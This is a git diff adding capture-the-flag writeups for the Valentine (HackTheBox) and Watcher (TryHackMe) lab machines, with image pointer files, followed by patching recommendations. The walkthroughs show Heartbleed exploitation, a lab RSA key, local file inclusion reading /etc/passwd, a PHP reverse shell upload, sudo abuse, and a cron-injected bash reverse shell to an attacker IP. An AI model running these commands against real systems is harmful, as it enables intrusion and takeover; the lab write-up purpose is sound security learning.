+By trying on the id\_rsa file of the root use, I can visualize its content ! So I try to create a local file with the RSA key and then connect via SSH to the root user but without success :(
+
+To validate the machine, I still look at the content of the `root.txt` file.
+
+![](img/image-17.webp)
+
+So I get the last flag, but I didn't get a root shell yet.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update the panel to avoid Paht Traversal
+- Do not let any program run in root if not necessary
diff --git a/content/writeup-ctf/writeup-valentine-htb/featured.png b/content/writeup-ctf/writeup-valentine-htb/featured.png
new file mode 100644
index 0000000..cb7316b
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3539d224b2ae4c9faf16e7eefbd5db5288f915caa11b66c1d0b328cd3da03770
+size 269289
diff --git a/content/writeup-ctf/writeup-valentine-htb/featured.webp b/content/writeup-ctf/writeup-valentine-htb/featured.webp
new file mode 100644
index 0000000..0bbaea7
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1c5bf51d71dd8a680ac73eed3458fdaae437cea2e8dff3630d548f726814ece1
+size 28084
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-1.png b/content/writeup-ctf/writeup-valentine-htb/img/image-1.png
new file mode 100644
index 0000000..b7c3bd9
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:68ff38a461c79681e15401af96454c580f030ae3968da880edf1e23b7b2321f6
+size 39360
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-1.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-1.webp
new file mode 100644
index 0000000..9452887
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c3c997ba457eea7ffb04774bea53ca0d01134c307de07b251fbf66906ac0d5c1
+size 33826
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-2.png b/content/writeup-ctf/writeup-valentine-htb/img/image-2.png
new file mode 100644
index 0000000..89d484d
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:645689ba3762229e3ac3b0ee77c6a30df680477e1a90851dea4e8ab17c717e61
+size 895817
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-2.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-2.webp
new file mode 100644
index 0000000..e11189f
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:10a0d0918ba5ff2534ceb909db11e33865f5ecfc32a83512529232f501c4bbad
+size 150720
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-3.png b/content/writeup-ctf/writeup-valentine-htb/img/image-3.png
new file mode 100644
index 0000000..599c535
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b0fc9f22b78bebc77dafee88d95e4ded010e95e86289d7b21672994d5f1798ed
+size 32583
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-3.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-3.webp
new file mode 100644
index 0000000..93dee62
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:29aae3eb38d08045a2218f06365d920f919a878a93c660a9dc8cd8947c3e9c18
+size 31426
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-4.png b/content/writeup-ctf/writeup-valentine-htb/img/image-4.png
new file mode 100644
index 0000000..f0d5bf4
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c23170c73c1e11440241b2d14e8a9cfe6f3331f9285c54e3886dad92722d77fb
+size 59010
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-4.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-4.webp
new file mode 100644
index 0000000..d401eab
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:83905310fc201e2f000c442386a002dc6ee81330b9bf2c6bb284913c1157a8ea
+size 108770
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-5.png b/content/writeup-ctf/writeup-valentine-htb/img/image-5.png
new file mode 100644
index 0000000..404e517
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9a31fde59951663b4c54c0aba4d9496f0c393a54f155bade30f8ac8271ac0913
+size 27909
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-5.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-5.webp
new file mode 100644
index 0000000..24a9927
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5bf95abcf51df1fec5c201907d013cb229a5e25fe0eef0f3b09f76b8f783fe15
+size 24544
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-6.png b/content/writeup-ctf/writeup-valentine-htb/img/image-6.png
new file mode 100644
index 0000000..0df870a
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:575bc2165086ffdb3098d3e9046ee6f5eba249b2c768aafbe7136150fd578143
+size 23837
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-6.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-6.webp
new file mode 100644
index 0000000..e23e917
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:53ed2715272b57adf75fbf3a3ba2bdb7c33a2a5be90059a5c06cf44b24a24d60
+size 24224
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-7.png b/content/writeup-ctf/writeup-valentine-htb/img/image-7.png
new file mode 100644
index 0000000..de9c5e5
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d8d5e71b66aceeac99eb0cb00d88bec1947966671d57cb5cd7183af37b4136b7
+size 6645
diff --git a/content/writeup-ctf/writeup-valentine-htb/img/image-7.webp b/content/writeup-ctf/writeup-valentine-htb/img/image-7.webp
new file mode 100644
index 0000000..dcd5db7
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:929717789379635d89b5e33a89d00233098ebd8c52d6ba51463b6afefd8658cd
+size 7834
diff --git a/content/writeup-ctf/writeup-valentine-htb/index.md b/content/writeup-ctf/writeup-valentine-htb/index.md
new file mode 100644
index 0000000..82c756a
--- /dev/null
+++ b/content/writeup-ctf/writeup-valentine-htb/index.md
@@ -0,0 +1,132 @@
+---
+title: "Writeup - Valentine (HTB)"
+date: 2022-05-05
+slug: "writeup-valentine-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Valentine](https://app.hackthebox.com/machines/Valentine) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.10.79
+```
+Three TCP port are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 5.9p1)
+- 80/tcp : HTTP (Apache 2.2.22)
+- 443/tcp : HTTPS (Apache 2.2.22)
+
+![](img/image-2.webp)
+
+## Exploit
+
+First, I start by scanning the site's folders.
+
+I quickly find the `/dev` folder where there are 2 files :
+
+
+```bash
+To do:
+
+1) Coffee.
+2) Research.
+3) Fix decoder/encoder before going live.
+4) Make sure encoding/decoding is only done client-side.
+5) Don't use the decoder/encoder until any of this is done.
+6) Find a better way to take notes.
+```
+
+```bash
+-----BEGIN RSA PRIVATE KEY-----
+Proc-Type: 4,ENCRYPTED
+DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46
+
+DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
+5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
+0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
+Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
+OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
+pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
+QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
+p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
+Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
+t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
+XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
+aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
++wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
+AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
+r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
+2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
+e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
+09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
+dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
+cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
+pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
+Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
+suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
+l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
+RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
+-----END RSA PRIVATE KEY-----
+```
+This second file is very interesting, it's an RSA key that should allow me to connect in SSH. The only problem is that it is encrypted and requires a password. So I try to brute force the password. For that I start by extracting a hash with the following command:
+
+
+```bash
+ssh2john id_rsa > hash
+```
+Then I launch John with the rockyou dictionary.
+
+![](img/image-3.webp)
+
+Unfortunately without success. Let's look for something else, after performing a vulnerability scan with Nmap, I find that the machine is vulnerable to CVE-2014-0160. After some research I find this github [github](https://github.com/sensepost/heartbleed-poc).
+
+![](img/image-4.webp)
+
+After some executions I find a string in base64:
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Documents]
+└─$ echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
+heartbleedbelievethehype
+```
+It could be a password, so I test to connect with :
+
+![](img/image-5.webp)
+
+I now have SSH access and can retrieve the first flag.
+
+{{< alert >}}
+While trying to connect via SSH I got the following error: `sign_and_send_pubkey: no mutual signature supported`. To solve the problem I had to add to the command: `PubkeyAcceptedKeyTypes=+ssh-rsa`.
+{{< /alert >}}
+
+## Privilege escalation
+
+At first I start by running the [linpeas.sh](https://linpeas.sh) script to find a vulnerability. I quickly find a tmux service executed by root.
+
+![](img/image-6.webp)
+
+After some research I find that it is possible to enter a tmux stream via the `-S` argument which allows to indicate a socket-path.
+
+
+```bash
+tmux -S /.devs/dev_sess
+```
+I now have a root shell and I can get the last flag.
+
+![](img/image-7.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not leave large files accessible directly from a website
+- Update the machine to fix CVE-2014-0160
+- Do not create a tmux session as root
diff --git a/content/writeup-ctf/writeup-watcher-thm/featured.png b/content/writeup-ctf/writeup-watcher-thm/featured.png
new file mode 100644
index 0000000..f383377
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1f15c28db1b5cb1bd581b2940cdc0760b779d7d1b2501743b3eacca3bf15f9ec
+size 135190
diff --git a/content/writeup-ctf/writeup-watcher-thm/featured.webp b/content/writeup-ctf/writeup-watcher-thm/featured.webp
new file mode 100644
index 0000000..94cc08c
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:40a9900a5716a04f308a355321c3bb05731555f3f0ce68cf9297dadbc4b3a5ca
+size 87760
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-1.png b/content/writeup-ctf/writeup-watcher-thm/img/image-1.png
new file mode 100644
index 0000000..ac84516
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:df357b9331975320a0dde865aa758d73431f76dd63e78ecaa4de23fc442da1d2
+size 37917
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-1.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-1.webp
new file mode 100644
index 0000000..956292f
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9921783a3a3d05ff7e8f1795a879ba2d69cda35f7ec3fa142445854f12166185
+size 38436
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-10.png b/content/writeup-ctf/writeup-watcher-thm/img/image-10.png
new file mode 100644
index 0000000..b668edd
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c05e13a8806a6e7ddd69b7ad05119993bb36acec7d5812b306207a941a4ef87d
+size 14191
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-10.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-10.webp
new file mode 100644
index 0000000..d9d655d
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:aaf38f2520ba12e21fd904c02c1dad990672edc6a8f2c5e7d6888e59ae499bda
+size 13826
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-11.png b/content/writeup-ctf/writeup-watcher-thm/img/image-11.png
new file mode 100644
index 0000000..87cd61a
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d691649eb5701e6f7b65396d39b6965c0a32677de82f809229c33b6bba665329
+size 25007
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-11.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-11.webp
new file mode 100644
index 0000000..65866aa
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:82ecd66308978a2daee30bb87db92bea52e8c9f53997dfeb98088ddb99a862a8
+size 20096
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-12.png b/content/writeup-ctf/writeup-watcher-thm/img/image-12.png
new file mode 100644
index 0000000..3c04dab
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d493080f655fd019add90db93d06d252991b18855188c841feba2d5f4fe8da5f
+size 40873
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-12.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-12.webp
new file mode 100644
index 0000000..0590d95
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1dad2a4bacb8eb056bf9f47a89e6b445c3faba35e5e5697975433c96fb33b83d
+size 41934
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-2.png b/content/writeup-ctf/writeup-watcher-thm/img/image-2.png
new file mode 100644
index 0000000..4cafb20
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:73737325efbd8d8167d490448befbccd41033665894faf5805cdb3a80cc31a07
+size 63804
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-2.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-2.webp
new file mode 100644
index 0000000..bb27a99
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:06e4828cb3c654560bb6dbef36f1083f95e7100fc684167dc2eec7029b827952
+size 51490
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-3.png b/content/writeup-ctf/writeup-watcher-thm/img/image-3.png
new file mode 100644
index 0000000..fd066e2
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:73790ede23d7ac69f63ed97d187fa5d6c1b640cb980682629a07aab55082769c
+size 122626
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-3.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-3.webp
new file mode 100644
index 0000000..320fee0
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:866b7ec7b2a1164c4e875c5f38594d7f9c672d7d3834e8d3947cb897bca0f857
+size 106746
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-4.png b/content/writeup-ctf/writeup-watcher-thm/img/image-4.png
new file mode 100644
index 0000000..466244c
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b54d59b3bc362ae368be87eba118647b4570648396e62d0187567ab33b846190
+size 25724
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-4.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-4.webp
new file mode 100644
index 0000000..86780a7
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b7787e4eaf5160656d2887fbaaf9b15e20d80af5dfa468fe9df28a6236a114d6
+size 25334
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-5.png b/content/writeup-ctf/writeup-watcher-thm/img/image-5.png
new file mode 100644
index 0000000..235ca56
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b3df4bbeb70d56b24372a6ae2d05841925172010f6caea40d891a3a3d71daf67
+size 29595
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-5.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-5.webp
new file mode 100644
index 0000000..6bc30e6
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a7d4216a853b74d32aaadcc54b3ef69e1d0c5a0109f988bc2d0467481fc3953c
+size 24612
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-6.png b/content/writeup-ctf/writeup-watcher-thm/img/image-6.png
new file mode 100644
index 0000000..7690e7c
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:72c1eb5c7d5aa3bc08be1e689c8ce403929a5baa4055c6c18601271664ee147c
+size 33149
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-6.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-6.webp
new file mode 100644
index 0000000..205e76f
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:756776911e19502142abfe1b9428d7377b7be8100858cd480764160ee3cfb923
+size 28508
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-7.png b/content/writeup-ctf/writeup-watcher-thm/img/image-7.png
new file mode 100644
index 0000000..6c0694d
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fc87f824b7ac23ca4dca42b57fc70b25572be35933ef62df0d63d4f458e971d5
+size 19059
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-7.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-7.webp
new file mode 100644
index 0000000..97dad08
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c492d33a4b529b85e97d8859e315bb5028690cdef7811ffd30497b8c59e1c922
+size 30040
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-8.png b/content/writeup-ctf/writeup-watcher-thm/img/image-8.png
new file mode 100644
index 0000000..ebd7325
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:88070f283adbfc40b764e58df824e7716476bdfba85a4aa413e403952d4b8200
+size 16042
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-8.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-8.webp
new file mode 100644
index 0000000..e8c9a85
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d6455518ff1592fcf4f6db8f61da431bc1e97bd0191d57a8dd9a005fc8a0a32d
+size 18780
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-9.png b/content/writeup-ctf/writeup-watcher-thm/img/image-9.png
new file mode 100644
index 0000000..4983344
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d0243b3fc1cbcdf63f2449a7a1139151070b4e76aa903b6d65842e1332df0669
+size 17271
diff --git a/content/writeup-ctf/writeup-watcher-thm/img/image-9.webp b/content/writeup-ctf/writeup-watcher-thm/img/image-9.webp
new file mode 100644
index 0000000..3b7e2da
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6e04852f4309d777558bba6a0bb065688fb4ca612145724765eae4149b5acb10
+size 19338
diff --git a/content/writeup-ctf/writeup-watcher-thm/index.md b/content/writeup-ctf/writeup-watcher-thm/index.md
new file mode 100644
index 0000000..547852f
--- /dev/null
+++ b/content/writeup-ctf/writeup-watcher-thm/index.md
@@ -0,0 +1,341 @@
+---
+title: "Writeup - Watcher (THM)"
+date: 2022-04-02
+slug: "writeup-watcher-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Watcher](https://tryhackme.com/room/watcher) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.91.35
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 21/tcp : FTP (vsftpd 3.0.3)
+- 22/tcp : SSH port (OpenSSH 7.6p1)
+- 80/tcp : HTTP web server (Apache 2.4.29)
+
+## Flag 1 - robots.txt
+
+At first I start by listing the pages of the website.
+
+![](img/image-2.webp)
+
+The `robots.txt` page catches my attention, so I go to it and find the following content:
+
+
+```bash
+User-agent: *
+Allow: /flag_1.txt
+Allow: /secret_file_do_not_read.txt
+```
+So we learn the existence of 2 pages, the first is accessible and gives us the first flag :
+
+
+```bash
+┌──(d3vyce㉿kali)-[~]
+└─$ curl http://10.10.91.35/flag_1.txt
+FLAG{robots_dot_text_what_is_next}
+```
+The second one is unfortunately not available at the moment.
+
+## Flag 2 - ftpuser
+
+After some research, I find that the page `post.php` has a `post` argument that allows to change the article. By trying a simple injection I can access the contents of a file that I know exists on the remote machine:
+
+
+```bash
+http://10.10.91.35/post.php?post=/etc/passwd
+```
+![](img/image-3.webp)
+
+I will be able to see the content of the page previously found:
+
+
+```bash
+┌──(d3vyce㉿kali)-[~]
+└─$ curl http://10.10.91.35/post.php?post=secret_file_do_not_read.txt
+[...]
+  Hi Mat,
+
+The credentials for the FTP server are below. I've set the files to be saved to /home/ftpuser/ftp/files.
+
+Will
+
+----------
+
+ftpuser:givemefiles777
+[...]
+```
+We learn that the credentials of the FTP server are: `ftpuser:givemefiles777`. So I can connect and list the files:
+
+![](img/image-4.webp)
+
+I find the file of the second one, I download it and I display it:
+
+
+```bash
+┌──(d3vyce㉿kali)-[~]
+└─$ cat flag_2.txt               
+FLAG{ftp_you_and_me}
+```
+## Flag 3 - www-data
+
+In addition to the reading rights, the FTP access allows me to send files. So I create a PHP reverse shell, then I upload it on the server.
+
+![](img/image-5.webp)
+
+I launch the script by accessing the following URL:
+
+
+```bash
+10.10.91.35/post.php?post=/home/ftpuser/ftp/files/reverse.php
+```
+![](img/image-6.webp)
+
+I now have a reverse shell, I look for the third flag with the following command:
+
+
+```bash
+$ find / -name flag_3.txt 2>/dev/null
+/var/www/html/more_secrets_a9f10a/flag_3.txt
+$ cat /var/www/html/more_secrets_a9f10a/flag_3.txt
+FLAG{lfi_what_a_guy}
+```
+## Flag 4 - toby
+
+Using the same command as above I find that the fourth flag is in the user `toby` folder. So I will have to find a way to change the user.
+
+![](img/image-7.webp)
+
+Looking at the sudo permissions I have with my current user, I find that I can run any command as `toby`. 
+
+
+```bash
+$ sudo -l
+Matching Defaults entries for www-data on watcher:
+    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+User www-data may run the following commands on watcher:
+    (toby) NOPASSWD: ALL
+```
+So I create a shell with the following command:
+
+
+```bash
+sudo -u toby /bin/sh
+```
+I can now recover the fourth flag.
+
+
+```bash
+toby@watcher:/home$ cat toby/flag_4.txt
+cat toby/flag_4.txt
+FLAG{chad_lifestyle}
+```
+## Flag 5 - mat
+
+After searching for the fifth flag I find that it is in the personal file of `mat`. 
+
+But I also find 2 files in the personal folder of my current user:
+
+
+```bash
+$ cat toby/note.txt
+Hi Toby,
+
+I've got the cron jobs set up now so don't worry about getting that done.
+
+Mat
+$ cat toby/jobs/cow.sh
+#!/bin/bash
+cp /home/mat/cow.jpg /tmp/cow.jpg
+```
+I then discover that the `cow.sh` script is executed every minute by the `mat` user. 
+
+
+```bash
+toby@watcher:/home$ cat /etc/crontab
+cat /etc/crontab
+# /etc/crontab: system-wide crontab
+[...]
+*/1 * * * * mat /home/toby/jobs/cow.sh
+```
+Knowing that I can modify the content of this script, I add a reverse shell to the file with the following command:
+
+
+```bash
+echo "/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1" >> toby/jobs/cow.sh
+```
+I now have a reverse shell as a `mat`:
+
+![](img/image-8.webp)
+
+And I can get the fifth flag back:
+
+
+```bash
+mat@watcher:~$ cat flag_5.txt   
+cat flag_5.txt
+FLAG{live_by_the_cow_die_by_the_cow}
+```
+## Flag 6 - will
+
+After searching for the sixth flag I find that it is in `will` personnel file.
+
+But I also find 1 file in the personal folder of my current user:
+
+
+```bash
+mat@watcher:~$ cat note.txt
+cat note.txt
+Hi Mat,
+
+I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe.
+
+Will
+```
+Looking at my sudo permissions, I discover that I can run the `will_scirpt.py` script as `will`.
+
